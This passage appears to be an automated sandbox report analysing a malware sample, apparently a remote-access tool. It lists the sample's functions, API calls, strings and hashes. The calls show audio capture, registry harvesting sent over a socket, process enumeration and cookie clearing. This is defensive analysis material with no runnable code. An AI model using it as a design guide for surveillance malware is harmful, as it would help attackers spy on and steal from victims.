                                                  • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,0214306A,00000000,00000000,?,00000001,?,?,?,?), ref: 02142F6A
                                                    • Part of subcall function 02136D66: RtlAllocateHeap.NTDLL(00000000,0212468A,?), ref: 02136D98
                                                  • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,0214306A,00000000,00000000,?,00000001,?,?,?,?), ref: 02142FE6
                                                  • __freea.LIBCMT ref: 02143011
                                                  • __freea.LIBCMT ref: 0214301D
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
                                                  • String ID:
                                                  • API String ID: 2829977744-0
                                                  • Opcode ID: 3bf6bddb58e2c22eb2473489dc4132bdb19f64c0de1c03d6ae40a4dd9e1f8fb6
                                                  • Instruction ID: 8f7275f35cb2025c095b8bdf1698aa7b7fe6487837fc58e84760a490051503af
                                                  • Opcode Fuzzy Hash: 3bf6bddb58e2c22eb2473489dc4132bdb19f64c0de1c03d6ae40a4dd9e1f8fb6
                                                  • Instruction Fuzzy Hash: 0191A371E802169EDF258F64D840EEEBBB5AF09714F2506A9FC19E7180DF35D880CBA0
                                                  Function 02103C2E Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 228COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: udp
                                                  • API String ID: 0-4243565622
                                                  • Opcode ID: feee9516c16efef68815b89ade9cbffe5bf55ce5106af849680fee818ce7e4b0
                                                  • Instruction ID: ac5baf3cf098ef65a9afab1ea09ffbc93d6aa214505a83eac263001f16bf3ea4
                                                  • Opcode Fuzzy Hash: feee9516c16efef68815b89ade9cbffe5bf55ce5106af849680fee818ce7e4b0
                                                  • Instruction Fuzzy Hash: 8A71CA306883468FDB29CF1984C472AB6E4AF88308F1445BEF8A5972D1D7B5CD45CB92
                                                  Function 0044F806 Relevance: 10.7, APIs: 7, Instructions: 204COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _free
                                                  • String ID:
                                                  • API String ID: 269201875-0
                                                  • Opcode ID: 6141bfdb7684140d9b9f029a8ead33158da868342510b0366010e9dcd8c93941
                                                  • Instruction ID: 5fecc71d39e6a90402c47f7728bb4f6831cdfeb90858b0dfc168023e2edb8b83
                                                  • Opcode Fuzzy Hash: 6141bfdb7684140d9b9f029a8ead33158da868342510b0366010e9dcd8c93941
                                                  • Instruction Fuzzy Hash: 2361BFB1900205AFEB20DF69C841BAABBF4EB45720F24417BE944FB392E7349D45CB59
                                                  Function 0213FA6D Relevance: 10.7, APIs: 7, Instructions: 204COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _free
                                                  • String ID:
                                                  • API String ID: 269201875-0
                                                  • Opcode ID: 154a0d9c569a12efbd1fb523a4d55ce0e4318de2d30962be95ff360cd9ef53d7
                                                  • Instruction ID: 9dd0d837bc3b6ddeee36d5fca80701be9f4197295a7027a258d425f4441374d3
                                                  • Opcode Fuzzy Hash: 154a0d9c569a12efbd1fb523a4d55ce0e4318de2d30962be95ff360cd9ef53d7
                                                  • Instruction Fuzzy Hash: D361E571D80209AFDB22DF64C841B9ABBF7EF05720F14416AEC58EB691E7719D42CB50
                                                  Function 02100D80 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 198memoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 02100820: SetLastError.KERNEL32(0000000D,02100D9F,?,00000000), ref: 02100826
                                                  • GetNativeSystemInfo.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,02100D7C), ref: 02100E2B
                                                  • GetProcessHeap.KERNEL32(00000008,00000040,?,?,00000000), ref: 02100E91
                                                  • RtlAllocateHeap.NTDLL(00000000), ref: 02100E98
                                                  • SetLastError.KERNEL32(0000045A,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 02100FA6
                                                  • SetLastError.KERNEL32(000000C1,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,02100D7C), ref: 02100FD0
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorLast$Heap$AllocateInfoNativeProcessSystem
                                                  • String ID: A
                                                  • API String ID: 4001361727-520424720
                                                  • Opcode ID: 79ee37443a4366c3bbea1b893000b12d050509257f9cb6c9a6ccb14135485088
                                                  • Instruction ID: 314984e74fac0af280dd1e432e59e9747256e9dc4c0c1027df664a91a4a59dc8
                                                  • Opcode Fuzzy Hash: 79ee37443a4366c3bbea1b893000b12d050509257f9cb6c9a6ccb14135485088
                                                  • Instruction Fuzzy Hash: 0B61C070685305AFC710AF25C9C1B6A7BA6BF88704F044029F9059B2C2EBF4E895DBE5
                                                  Function 00443F7B Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 187COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00446AFF: RtlAllocateHeap.NTDLL(00000000,00434423,?,?,00437227,?,?,00000000,00475B70,?,0040CC87,00434423,?,?,?,?), ref: 00446B31
                                                  • _free.LIBCMT ref: 00444086
                                                  • _free.LIBCMT ref: 0044409D
                                                  • _free.LIBCMT ref: 004440BC
                                                  • _free.LIBCMT ref: 004440D7
                                                  • _free.LIBCMT ref: 004440EE
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _free$AllocateHeap
                                                  • String ID: J7D
                                                  • API String ID: 3033488037-1677391033
                                                  • Opcode ID: 38e5a99fceb1209b970ed7ac5d3209ab3957ca8cf69c4f68c5a23a15f0ca7666
                                                  • Instruction ID: b5a2c1f2d034459fb850ff781f480331835685433a1d37f27cfcf8091ebf3f31
                                                  • Opcode Fuzzy Hash: 38e5a99fceb1209b970ed7ac5d3209ab3957ca8cf69c4f68c5a23a15f0ca7666
                                                  • Instruction Fuzzy Hash: 9251E371A00604AFEB20DF6AC841B6AB3F4EF95724F14416EE909D7251E739ED15CB88
                                                  Function 0044A0C3 Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,0044A838,?,00000000,00000000,00000000,00000000,0000000C), ref: 0044A105
                                                  • __fassign.LIBCMT ref: 0044A180
                                                  • __fassign.LIBCMT ref: 0044A19B
                                                  • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 0044A1C1
                                                  • WriteFile.KERNEL32(?,00000000,00000000,0044A838,00000000,?,?,?,?,?,?,?,?,?,0044A838,?), ref: 0044A1E0
                                                  • WriteFile.KERNEL32(?,?,00000001,0044A838,00000000,?,?,?,?,?,?,?,?,?,0044A838,?), ref: 0044A219
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                  • String ID:
                                                  • API String ID: 1324828854-0
                                                  • Opcode ID: c2a57007ecaabeafdb2dea6b541a07f99f491d21749d301156e70ae2fc22959b
                                                  • Instruction ID: b40464c9ec282996611fef5cbd20273031f87559cdf671a411eba52403cbf28d
                                                  • Opcode Fuzzy Hash: c2a57007ecaabeafdb2dea6b541a07f99f491d21749d301156e70ae2fc22959b
                                                  • Instruction Fuzzy Hash: DB51E270E002099FEB10CFA8D881AEEBBF8FF09300F14416BE815E3391D6749951CB6A
                                                  Function 004559CA Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 152COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _free
                                                  • String ID: HE$HE
                                                  • API String ID: 269201875-1978648262
                                                  • Opcode ID: 396dac2f3812ff065a3283cc201ba07d86737f2a766ab43e7d660d85bd51e2e6
                                                  • Instruction ID: 4134de32792d44acead4bb36f8da9b5b282593f8ffe10db144b1eaf4d9577b64
                                                  • Opcode Fuzzy Hash: 396dac2f3812ff065a3283cc201ba07d86737f2a766ab43e7d660d85bd51e2e6
                                                  • Instruction Fuzzy Hash: 90412A31A009106BEF24AABA8CD5A7F3B64DF45375F14031BFC1896293D67C8C4996AA
                                                  Function 0213A32A Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetConsoleCP.KERNEL32(FF8BC35D,00000000,?,?,?,?,?,?,?,0213AA9F,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 0213A36C
                                                  • __fassign.LIBCMT ref: 0213A3E7
                                                  • __fassign.LIBCMT ref: 0213A402
                                                  • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 0213A428
                                                  • WriteFile.KERNEL32(?,FF8BC35D,00000000,0213AA9F,00000000,?,?,?,?,?,?,?,?,?,0213AA9F,?), ref: 0213A447
                                                  • WriteFile.KERNEL32(?,?,00000001,0213AA9F,00000000,?,?,?,?,?,?,?,?,?,0213AA9F,?), ref: 0213A480
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                  • String ID:
                                                  • API String ID: 1324828854-0
                                                  • Opcode ID: d742a0ed7e7f80d5daee9f90daca0257aad30d4fad8407fa3c2509fb5468b32f
                                                  • Instruction ID: a3075fb2f9c7d815304240a4f4cf18ba0bf59307ffae35712d59676bf0bb4f26
                                                  • Opcode Fuzzy Hash: d742a0ed7e7f80d5daee9f90daca0257aad30d4fad8407fa3c2509fb5468b32f
                                                  • Instruction Fuzzy Hash: 5151E870E40205AFCF11CFA8D845AEEBBFAEF09310F18416AE999E7291D730D940CB60
                                                  Function 00412C88 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 135registryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • RegOpenKeyExW.ADVAPI32(00000000,00000000,00000000,00020019,?), ref: 00412CC1
                                                    • Part of subcall function 004129AA: RegQueryInfoKeyW.ADVAPI32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00412A1D
                                                    • Part of subcall function 004129AA: RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?,?,00000000,?,?,?,?), ref: 00412A4C
                                                    • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                  • RegCloseKey.ADVAPI32(TUFTUF,00465554,00465554,00465900,00465900,00000071), ref: 00412E31
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseEnumInfoOpenQuerysend
                                                  • String ID: TUFTUF$>G$DG$DG
                                                  • API String ID: 3114080316-344394840
                                                  • Opcode ID: c3dd97182f9ce844ebb49620a6f088c96f11194fd2e2bdef260f1bda12a991b1
                                                  • Instruction ID: 92049c6ae7fba3f13a57cd60a3827c89810429dfa6cf24b756c0ab1f01d338b1
                                                  • Opcode Fuzzy Hash: c3dd97182f9ce844ebb49620a6f088c96f11194fd2e2bdef260f1bda12a991b1
                                                  • Instruction Fuzzy Hash: 0141A2316042009BC224F635D9A2AEF7394AFD0708F50843FF94A671E2EF7C5D4986AE
                                                  Function 020FE90A Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 132processCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 0210B3C2: GetCurrentProcess.KERNEL32(00000003,?,?,0210A6D8,00000000,00474358,00000003,0046662C,00000000,0000000E,00000000,0046556C,00000003,00000000), ref: 0210B3D3
                                                    • Part of subcall function 0210B3C2: IsWow64Process.KERNEL32(00000000,?,?,0210A6D8,00000000,00474358,00000003,0046662C,00000000,0000000E,00000000,0046556C,00000003,00000000), ref: 0210B3DA
                                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 020FE928
                                                  • Process32FirstW.KERNEL32(00000000,?), ref: 020FE94C
                                                  • Process32NextW.KERNEL32(00000000,0000022C), ref: 020FE95B
                                                  • CloseHandle.KERNEL32(00000000), ref: 020FEB12
                                                    • Part of subcall function 0210B3EE: OpenProcess.KERNEL32(00000400,00000000), ref: 0210B403
                                                    • Part of subcall function 0210B3EE: IsWow64Process.KERNEL32(00000000,?), ref: 0210B40E
                                                    • Part of subcall function 0210B5E4: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0210B5FC
                                                    • Part of subcall function 0210B5E4: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0210B60F
                                                  • Process32NextW.KERNEL32(00000000,0000022C), ref: 020FEB03
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Process$OpenProcess32$NextWow64$CloseCreateCurrentFirstHandleSnapshotToolhelp32
                                                  • String ID: PgF
                                                  • API String ID: 2180151492-654241383
                                                  • Opcode ID: 4103c74ef064f91666f8864adad10e095dbae6404165e6ea80ccaa02d20916fc
                                                  • Instruction ID: 7f7c8a749285d6edc9369c35a104b81fbc4cef4b7dee7e4d8ea4c5b1837d81a0
                                                  • Opcode Fuzzy Hash: 4103c74ef064f91666f8864adad10e095dbae6404165e6ea80ccaa02d20916fc
                                                  • Instruction Fuzzy Hash: CD4103312883405FD3A5FB20DC51AEF77EABFE4300F54456DEA4A82594EF309A09DE56
                                                  Function 00437A80 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 117COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • _ValidateLocalCookies.LIBCMT ref: 00437AAB
                                                  • ___except_validate_context_record.LIBVCRUNTIME ref: 00437AB3
                                                  • _ValidateLocalCookies.LIBCMT ref: 00437B41
                                                  • __IsNonwritableInCurrentImage.LIBCMT ref: 00437B6C
                                                  • _ValidateLocalCookies.LIBCMT ref: 00437BC1
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                  • String ID: csm
                                                  • API String ID: 1170836740-1018135373
                                                  • Opcode ID: 47e26074ed3df67517ea761fc7c27dd00097028ab85dfbf9f1f14e41715e449f
                                                  • Instruction ID: 9404c61c081bc4e6da2099be8a52027e1297fde76841380def533d3eaa533744
                                                  • Opcode Fuzzy Hash: 47e26074ed3df67517ea761fc7c27dd00097028ab85dfbf9f1f14e41715e449f
                                                  • Instruction Fuzzy Hash: CD410970A04209DBCF20EF19C844A9FBBB5AF0932CF14915BE8556B392D739EE05CB95
                                                  Function 004426D4 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 116COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\yPIOW6yoPi.exe,00000104), ref: 00442714
                                                  • _free.LIBCMT ref: 004427DF
                                                  • _free.LIBCMT ref: 004427E9
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _free$FileModuleName
                                                  • String ID: C:\Users\user\Desktop\yPIOW6yoPi.exe$XNY$h'X
                                                  • API String ID: 2506810119-3846325169
                                                  • Opcode ID: 037ffcd8ae4620a35ea0d85ea656a28a2901847f16e257e4da60b9a7372ecd68
                                                  • Instruction ID: 3cff5717343a4e3a710d875500e96c622d597d45f5ef159119de948e6b6562f0
                                                  • Opcode Fuzzy Hash: 037ffcd8ae4620a35ea0d85ea656a28a2901847f16e257e4da60b9a7372ecd68
                                                  • Instruction Fuzzy Hash: 3E31B371A00218AFEB21DF9ADD81D9EBBFCEB85314F54406BF804A7311D6B88E41DB59
                                                  Function 0210409E Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 109libraryloaderCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 021040ED
                                                  • LoadLibraryA.KERNEL32(?), ref: 0210412F
                                                  • LoadLibraryA.KERNEL32(?), ref: 0210418E
                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 021041B6
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: LibraryLoad$AddressDirectoryProcSystem
                                                  • String ID: g<A$#v
                                                  • API String ID: 4217395396-1454644526
                                                  • Opcode ID: ba6e91efba9758633ea9bec27d31a254a4df24d425156724d9bfa6bc4db7eb59
                                                  • Instruction ID: 6be393f0a8f1570aa92cf74d39ba2057592789e94e9d3bed7e93642b9864afb8
                                                  • Opcode Fuzzy Hash: ba6e91efba9758633ea9bec27d31a254a4df24d425156724d9bfa6bc4db7eb59
                                                  • Instruction Fuzzy Hash: BF31E5B19463156BD320EB64DCC4E9F77DCEF44794F040A25E994E3240E7B4E9418BEA
                                                  Function 020F1CF5 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 89COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • _strftime.LIBCMT ref: 020F1D3A
                                                    • Part of subcall function 020F1E4F: CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 020F1EBB
                                                  • waveInUnprepareHeader.WINMM(00471AC0,00000020,00000000,?), ref: 020F1DEC
                                                  • waveInPrepareHeader.WINMM(00471AC0,00000020), ref: 020F1E2A
                                                  • waveInAddBuffer.WINMM(00471AC0,00000020), ref: 020F1E39
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: wave$Header$BufferCreateFilePrepareUnprepare_strftime
                                                  • String ID: `=G$x=G
                                                  • API String ID: 3809562944-3004145341
                                                  • Opcode ID: 05fbe3f0275308aa01def130e1c9f559704be22902734a160a2ccb4d88025906
                                                  • Instruction ID: ffc8bc6ff22630520a3e4628cbae0019d8ae119b97ac346e3cf3b0d880e230a4
                                                  • Opcode Fuzzy Hash: 05fbe3f0275308aa01def130e1c9f559704be22902734a160a2ccb4d88025906
                                                  • Instruction Fuzzy Hash: F8319E325843409FC3A4EF24DC54ADE77EAFB84300F004439EA59829B5EF70AA49DF5A
                                                  Function 0040B6EA Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 85COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00412513: RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 00412537
                                                    • Part of subcall function 00412513: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 00412554
                                                    • Part of subcall function 00412513: RegCloseKey.KERNEL32(?), ref: 0041255F
                                                  • ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000), ref: 0040B76C
                                                  • PathFileExistsA.SHLWAPI(?), ref: 0040B779
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseEnvironmentExistsExpandFileOpenPathQueryStringsValue
                                                  • String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
                                                  • API String ID: 1133728706-4073444585
                                                  • Opcode ID: 168306c1d9a20041e62edbc44da32d9946e7b93686fd1ff98ae257cc9e607522
                                                  • Instruction ID: d844a8c095f6bc09782a4352348c5dfd082864f820bca84d12e352ec49be167e
                                                  • Opcode Fuzzy Hash: 168306c1d9a20041e62edbc44da32d9946e7b93686fd1ff98ae257cc9e607522
                                                  • Instruction Fuzzy Hash: 5F216D71A00109A6CB04F7B2DCA69EE7764AE95318F40013FE902771D2EB7C9A49C6DE
                                                  Function 00455903 Relevance: 10.6, APIs: 7, Instructions: 80COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: a689da314200d05c27aed096e5791327431372d8d81dee2cdc260883e4ab0459
                                                  • Instruction ID: 969edc756a0dffe936139f0dc9bce31aed38431af2e56c5058bd22e5c2f4fad6
                                                  • Opcode Fuzzy Hash: a689da314200d05c27aed096e5791327431372d8d81dee2cdc260883e4ab0459
                                                  • Instruction Fuzzy Hash: 991124B1508654FBDB202F769C4493B3B6CEF82376B10016FFC15D7242DA7C8805C2AA
                                                  Function 02145B6A Relevance: 10.6, APIs: 7, Instructions: 80COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 73f4216d9227424834ab683a62f21571e8b2afaadca920fe74bb7b8a40116277
                                                  • Instruction ID: 988fa648db5904b0786bfa03924476be5c349cb7512080152120f4f263a4bd0b
                                                  • Opcode Fuzzy Hash: 73f4216d9227424834ab683a62f21571e8b2afaadca920fe74bb7b8a40116277
                                                  • Instruction Fuzzy Hash: 7411D672588219BFCB212FB69C48D6B7B6FDF85771B510569F819C6240DF31C901CAA0
                                                  Function 0040FBEF Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 71COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 0040FBFC
                                                  • int.LIBCPMT ref: 0040FC0F
                                                    • Part of subcall function 0040CEE0: std::_Lockit::_Lockit.LIBCPMT ref: 0040CEF1
                                                    • Part of subcall function 0040CEE0: std::_Lockit::~_Lockit.LIBCPMT ref: 0040CF0B
                                                  • std::_Facet_Register.LIBCPMT ref: 0040FC4B
                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 0040FC71
                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 0040FC8D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                                                  • String ID: P[G
                                                  • API String ID: 2536120697-571123470
                                                  • Opcode ID: 31ce6fe8dfd7390de1d64992225249e105d572f1378bab70f4a441faf385e78a
                                                  • Instruction ID: a46b155a0a589d4ea75c4983af6a631921b9d9812a15003568faaf62f6f01cf1
                                                  • Opcode Fuzzy Hash: 31ce6fe8dfd7390de1d64992225249e105d572f1378bab70f4a441faf385e78a
                                                  • Instruction Fuzzy Hash: 7611F331904518A7CB14FBA5D8469DEB7689E44358B20007BF905B72C1EB7CAE45C79D
                                                  Function 020FFE56 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 71COMMON
                                                  Download Yara Rule
                                                  APIs
